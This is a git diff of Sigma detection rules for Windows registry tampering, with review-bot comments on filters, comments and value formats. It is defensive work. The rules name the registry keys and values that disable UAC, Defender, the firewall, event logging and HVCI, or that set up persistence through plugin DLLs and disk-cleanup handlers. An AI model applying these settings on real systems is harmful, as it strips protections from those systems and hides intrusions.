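Review bot: The rewritten block-literal `description` keeps the typo `regsitry` on its first line; since the hunk already rewrites this scalar, the line should read `Detects registry value settings that would replace the user's desktop background.`. The rest of the converted description is unchanged in substance and reads fine.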
@@ -40,18 +36,17 @@ detection: - CurrentVersion\Policies\System selection_values_1: TargetObject|endswith: NoChangingWallpaper - Details: DWORD (0x00000001) + Details: DWORD (0x00000001) # Prevent changing desktop background selection_values_2: TargetObject|endswith: \Wallpaper selection_values_3: TargetObject|endswith: \WallpaperStyle - Details: '2' + Details: '2' # Stretch filter_main_svchost: + # Note: Excluding GPO changes Image|endswith: \svchost.exe - condition: registry_set and (selection_keys and 1 of selection_values_* and not - 1 of filter_main_*) + condition: registry_set and (selection_keys and 1 of selection_values_* and not 1 of filter_main_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 959c9842e..209cb40f6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml 
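Review bot: The new `# Note: Excluding GPO changes` comment on `filter_main_svchost` explains the intent, but the exclusion itself is `Image|endswith: \svchost.exe`, so any binary named svchost.exe in any directory is excluded from this wallpaper-tampering rule. The sibling rule in this same commit, registry_set_disable_winevt_logging.yml, anchors the equivalent filter with `Image: C:\Windows\System32\svchost.exe`; using the same full path here keeps the GPO exclusion without also excluding lookalikes outside System32. The `selection_keys` list this hunk touches begins outside the hunk, so whether the filter could additionally be narrowed to the `CurrentVersion\Policies\System` key is something to confirm against the lines above.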
@@ -1,10 +1,7 @@ title: Hypervisor Enforced Code Integrity Disabled id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a status: experimental -description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and - the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced - Code Integrity feature. This allows an attacker to load unsigned and untrusted - code to be run in the kernel +description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel references: - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci @@ -23,7 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|endswith: - \Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity - \Control\DeviceGuard\HypervisorEnforcedCodeIntegrity diff --git a/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml b/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml index a4e9bff84..8ae0b3784 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml 
@@ -1,9 +1,7 @@ title: DHCP Callout DLL Installation id: 9d3436ef-9476-4c43-acca-90ce06bdf33a status: test -description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled - parameter in Registry, which can be used to execute code in context of the DHCP - server (restart required) +description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml index ccf7272a6..46fb13354 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml @@ -1,9 +1,7 @@ title: Disable Administrative Share Creation at Startup id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e status: test -description: Administrative shares are hidden network shares created by Microsoft - Windows NT operating systems that grant system administrators remote access to - every disk volume on a network-connected system +description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup author: frack113 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml index 77eeaa8f2..f5706c11c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -1,8 +1,7 @@ title: Potential AutoLogger Sessions Tampering id: f37b4bce-49d0-4087-9f5b-58bffda77316 status: experimental -description: Detects tampering with autologger trace sessions which is a technique - used by attackers to disable logging +description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ @@ -23,7 +22,7 @@ detection: selection_main: TargetObject|contains: \System\CurrentControlSet\Control\WMI\Autologger\ selection_values: - TargetObject|contains: + TargetObject|contains: # We only care about some autologger to avoid FP. Add more if you need - \EventLog- - \Defender TargetObject|endswith: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml index 9ef76345b..5d628ff2a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml 
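Review bot: The inline comment added to `TargetObject|contains:` in `selection_values` is hard to parse (`We only care about some autologger to avoid FP. Add more if you need`); it should say what is restricted and why, e.g. `# Only the EventLog and Defender AutoLogger sessions are matched to limit false positives; extend the list if other sessions matter in your environment`. The two list entries below it (`\EventLog-`, `\Defender`) are the only sessions the rule covers, so a reader tuning the rule benefits from that being stated plainly.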
@@ -1,8 +1,7 @@ title: Disable Microsoft Defender Firewall via Registry id: 974515da-6cc5-4c95-ae65-f97f9150ec7f status: test -description: Adversaries may disable or modify system firewalls in order to bypass - controls limiting network usage +description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry author: frack113 @@ -20,6 +19,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall TargetObject|startswith: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\ TargetObject|endswith: \EnableFirewall Details: DWORD (0x00000000) diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml index 3bee9c1fa..4a5b28784 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml 
@@ -1,8 +1,7 @@ title: Disable Internal Tools or Feature in Registry id: e2482f8d-3443-4237-b906-cc145d87a076 status: experimental -description: Detects registry modifications that change features of internal Windows - tools (malware like Agent Tesla uses this technique) +description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml index ec32958fa..647d83c7e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml @@ -1,7 +1,6 @@ title: Disable Macro Runtime Scan Scope id: ab871450-37dc-4a3a-997f-6662aa8ae0f1 -description: Detects tampering with the MacroRuntimeScanScope registry key to disable - runtime scanning of enabled macros +description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros status: experimental date: 2022/10/25 modified: 2023/08/17 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml index 52fdbe02e..966a23d58 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml 
@@ -1,8 +1,7 @@ title: Disable Windows Security Center Notifications id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 status: experimental -description: Detect set UseActionCenterExperience to 0 to disable the Windows security - center notification +description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml index f24dd2a11..be3e4da4c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml @@ -1,8 +1,7 @@ title: Registry Disable System Restore id: 5de03871-5d46-4539-a82d-3aa992a69a83 status: experimental -description: Detects the modification of the registry to disable a system restore - on the computer +description: Detects the modification of the registry to disable a system restore on the computer references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml index 1d0de0a8e..551d6013a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml 
@@ -1,9 +1,7 @@ title: Disable UAC Using Registry id: 48437c39-9e5f-47fb-af95-3d663c3f2919 status: experimental -description: Detects when an attacker tries to disable User Account Control (UAC) - by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA - from 1 to 0 +description: Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml index 2333c7733..16fd551ff 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml @@ -1,12 +1,11 @@ title: Windows Defender Service Disabled id: e1aa95de-610a-427d-b9e7-9b46cfafbe6a status: experimental -description: Detects when an attacker or tool disables the Windows Defender service - (WinDefend) via the registry +description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 -author: "J\xE1n Tren\u010Dansk\xFD, frack113, AlertIQ, Nasreddine Bencherchali" +author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali date: 2022/08/01 modified: 2023/08/17 tags: 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml index a8b4ef9c8..295f550ec 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows Event Logging Via Registry id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 status: experimental -description: Detects tampering with the "Enabled" registry key in order to disable - Windows logging of a Windows event channel +description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp @@ -25,10 +24,10 @@ detection: TargetObject|endswith: \Enabled Details: DWORD (0x00000000) filter_main_wevutil: - Image|endswith: \Windows\system32\wevtutil.exe + Image|endswith: \Windows\system32\wevtutil.exe # FP generated during installation of manifests via wevtutil filter_main_iis: Image|startswith: C:\Windows\winsxs\ - Image|endswith: \TiWorker.exe + Image|endswith: \TiWorker.exe # Many different TargetObjects filter_main_svchost: Image: C:\Windows\System32\svchost.exe TargetObject|contains: 
@@ -40,14 +39,12 @@ detection: filter_main_trusted_installer: Image: C:\Windows\servicing\TrustedInstaller.exe TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Compat-Appraiser - filter_optional_empty: + filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: '' - filter_optional_null: - Image: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later + Image: + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Rare falsepositives may occur from legitimate administrators disabling specific - event log for troubleshooting + - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml index b6eebea3f..677601222 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml @@ -19,8 +19,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security - Center\App and Browser protection\DisallowExploitProtectionOverride + TargetObject|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride Details: DWORD (00000001) condition: registry_set and selection falsepositives: 
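Review bot: `filter_optional_null` now reads `Image:` with no value, relying on YAML's implicit null where the old side had the explicit `Image: null`; a reader can mistake the bare key for an unfinished entry, so keep it as `Image: null` and let the comment carry the intent. The comment itself (`This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later`) is duplicated verbatim on `filter_optional_empty` and `filter_optional_null` and embeds a second `#` inside a comment; one `# TODO(aurora): drop both filter_optional_* entries once the agent fix is deployed` on the first key, with a tracking reference if one exists, would be clearer. The unchanged `filter_main_wevutil` key on the context line above appears to be a misspelling of wevtutil; renaming it is safe because the condition uses `1 of filter_main_*`.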
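Review bot: `Details: DWORD (00000001)` on the context line directly below the reflowed `TargetObject|contains:` lacks the `0x` prefix that Sysmon uses when rendering REG_DWORD values, and every other rule in this commit matches the form `DWORD (0x00000001)` (for example `NoChangingWallpaper` in registry_set_desktop_background_change.yml), so this selection is unlikely to ever match. The commit only unwraps the folded TargetObject, but while this selection is being touched the value should become `Details: DWORD (0x00000001)`. The condition is plain `registry_set and selection`, so there is no alternative selection that would still fire.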
diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml index 2ce54d1df..09921a15f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml @@ -1,8 +1,7 @@ title: Disabled Windows Defender Eventlog id: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 status: experimental -description: Detects the disabling of the Windows Defender eventlog as seen in relation - to Lockbit 3.0 infections +description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections references: - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 author: Florian Roth (Nextron Systems) @@ -20,12 +19,10 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows - Defender/Operational\Enabled + TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational\Enabled Details: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Other Antivirus software installations could cause Windows to disable that eventlog - (unknown) + - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml index 272b9faf9..d719480a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml 
+++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml @@ -21,10 +21,10 @@ detection: selection: TargetObject|contains: \Microsoft\Windows Defender\Features\TamperProtection Details: DWORD (0x00000000) - filter_msmpeng_client: + filter_msmpeng_client: # only disabled temporarily during updates Image|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ Image|endswith: \MsMpEng.exe - filter_msmpeng_domain_controller: + filter_msmpeng_domain_controller: # only disabled temporarily during updates Image: C:\Program Files\Windows Defender\MsMpEng.exe condition: registry_set and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml b/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml index 71b31605f..3d73dcd37 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml @@ -1,8 +1,7 @@ title: Add DisallowRun Execution to Registry id: 275641a5-a492-45e2-a817-7c81e9d9d3e9 status: experimental -description: Detect set DisallowRun to 1 to prevent user running specific computer - program +description: Detect set DisallowRun to 1 to prevent user running specific computer program references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml index 7db505ef8..a4c5b40dc 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml 
@@ -1,16 +1,13 @@ title: Persistence Via Disk Cleanup Handler - Autorun id: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc status: experimental -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence via autorun.\nThe disk cleanup manager\ - \ is part of the operating system.\nIt displays the dialog box [\u2026] The user\ - \ has the option of enabling or disabling individual handlers by selecting or\ - \ clearing their check box in the disk cleanup manager's UI.\nAlthough Windows\ - \ comes with a number of disk cleanup handlers, they aren't designed to handle\ - \ files produced by other applications.\nInstead, the disk cleanup manager is\ - \ designed to be flexible and extensible by enabling any developer to implement\ - \ and register their own disk cleanup handler.\nAny developer can extend the available\ - \ disk cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. + The disk cleanup manager is part of the operating system. + It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ 
@@ -30,6 +27,7 @@ detection: root: TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ selection_autorun: + # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean TargetObject|contains: \Autorun Details: DWORD (0x00000001) selection_pre_after: @@ -37,6 +35,7 @@ detection: - \CleanupString - \PreCleanupString Details|contains: + # Add more as you see fit - cmd - powershell - rundll32 diff --git a/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml index e4e74ccd5..fa472e1c1 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml @@ -1,15 +1,10 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 status: test -description: 'Detects when a user enables DNS-over-HTTPS. - - This can be used to hide internet activity or be used to hide the process of exfiltrating - data. - - With this enabled organization will lose visibility into data such as query type, - response and originating IP that are used to determine bad actors. - - ' +description: | + Detects when a user enables DNS-over-HTTPS. + This can be used to hide internet activity or be used to hide the process of exfiltrating data. + With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 diff --git a/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml index 1c46999fa..c1e1b5832 100644 
--- a/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed id: e61e8a88-59a9-451c-874e-70fcc9740d67 related: - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived - - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 - type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived status: experimental -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml index 0bc595a47..87379c9da 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml @@ -1,8 +1,8 @@ title: ETW Logging Disabled In .NET Processes - Sysmon Registry id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 related: - - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc - type: similar + - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc + type: similar status: test description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. references: 
@@ -40,7 +40,7 @@ detection: - \COMPlus_ETWEnabled - \COMPlus_ETWFlags Details: - - 0 + - 0 # For REG_SZ type - DWORD (0x00000000) condition: registry_set and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml b/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml index 120fd5270..73ddc702e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml @@ -1,8 +1,7 @@ title: Enabling COR Profiler Environment Variables id: ad89044a-8f49-4673-9a55-cbd88a1b374f status: test -description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and - "cor_profiler" variables being set and configured. +description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. references: - https://twitter.com/jamieantisocial/status/1304520651248668673 - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors diff --git a/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml index adc161c11..f42a8e5a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml 
@@ -1,8 +1,7 @@ title: Scripted Diagnostics Turn Off Check Enabled - Registry id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 status: experimental -description: Detects enabling TurnOffCheck which can be used to bypass defense of - MSDT Follina vulnerability +description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability references: - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw author: Christopher Peacock @securepeacock, SCYTHE @scythe_io diff --git a/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml index ffa62eaf7..d2a8fe617 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml @@ -1,9 +1,7 @@ title: Potential EventLog File Location Tampering id: 0cb8d736-995d-4ce7-a31e-1e8d452a1459 status: experimental -description: Detects tampering with EventLog service "file" key. In order to change - the default location of an Evtx file. This technique is used to tamper with log - collection and alerting +description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting references: - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key author: D3F7A5105 diff --git a/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml index 425ef83eb..1895d76f0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml 
@@ -1,8 +1,7 @@
title: Suspicious Application Allowed Through Exploit Guard
id: 42205c73-75c8-4a63-9db1-e3782e06fda0
status: experimental
-description: Detects applications being added to the "allowed applications" list of
- exploit guard in order to bypass controlled folder settings
+description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
references:
- https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,10 +19,10 @@ detection:
EventID: 13
Channel: Microsoft-Windows-Sysmon/Operational
selection_key:
- TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender
- Exploit Guard\Controlled Folder Access\AllowedApplications
+ TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications
selection_paths:
TargetObject|contains:
+ # Add more paths you don't allow in your org
- \Users\Public\
- \AppData\Local\Temp\
- \Desktop\
diff --git a/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml b/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml
index 25e2e63c9..4df72c119 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml
@@ -1,8 +1,7 @@
title: Change User Account Associated with the FAX Service
id: e3fdf743-f05b-4051-990a-b66919be1743
status: test
-description: Detect change of the user account associated with the FAX service to
- avoid the escalation problem.
+description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
references:
- https://twitter.com/dottor_morte/status/1544652325570191361
